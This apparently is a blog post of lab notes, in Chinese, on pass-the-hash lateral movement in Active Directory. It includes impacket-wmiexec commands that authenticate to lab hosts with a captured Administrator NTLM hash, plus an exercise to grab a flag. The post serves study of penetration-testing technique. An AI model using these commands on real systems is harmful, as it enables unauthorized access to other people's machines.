Active Directory 中的橫向移動 - PtH

 Active Directory 中的橫向移動 - PtH


PtH 允許攻擊者使用使用者的 NTLM 雜湊而不是關聯的明文密碼,直接對遠端系統或服務進行身份驗證,請注意,這不適用於 Kerberos 驗證,而僅適用於使用 NTLM 驗證的伺服器或服務。

重點在於攻擊者使用伺服器訊息區塊(SMB) 協定連接到受害者,並使用 NTLM 雜湊執行身份驗證,所以目標機器必須有開啟 445 Port SMB 服務

之前拿到了 Files04 本機 Administrator 的 HASH "2892D26CDF84D7A70E2EB3B9F05C425E "

所以讓我們直接在 kali 攻擊機上使用 impacket-wmiexec 進行 PtH 如下指令

└─$ /usr/bin/impacket-wmiexec -hashes :2892D26CDF84D7A70E2EB3B9F05C425E Administrator@192.168.191.73

登入後 whoami、hostname、ipconfig 看一下確實是 Files04 機器





練習 : 執行傳遞哈希技術以橫向移動到 web04 以取得位於管理員桌面上的標誌

直接執行指令 └─$ /usr/bin/impacket-wmiexec -hashes :2892D26CDF84D7A70E2EB3B9F05C425E Administrator@192.168.191.72

看來每一台的 Administrator 使用的密碼都一樣,可以登入那就直接 type 拿 flag 吧




留言

這個網誌中的熱門文章

Challenge 0 - Secura(2)

Challenge 0 - Secura(1)

Challenge 8 - Poseidon(0)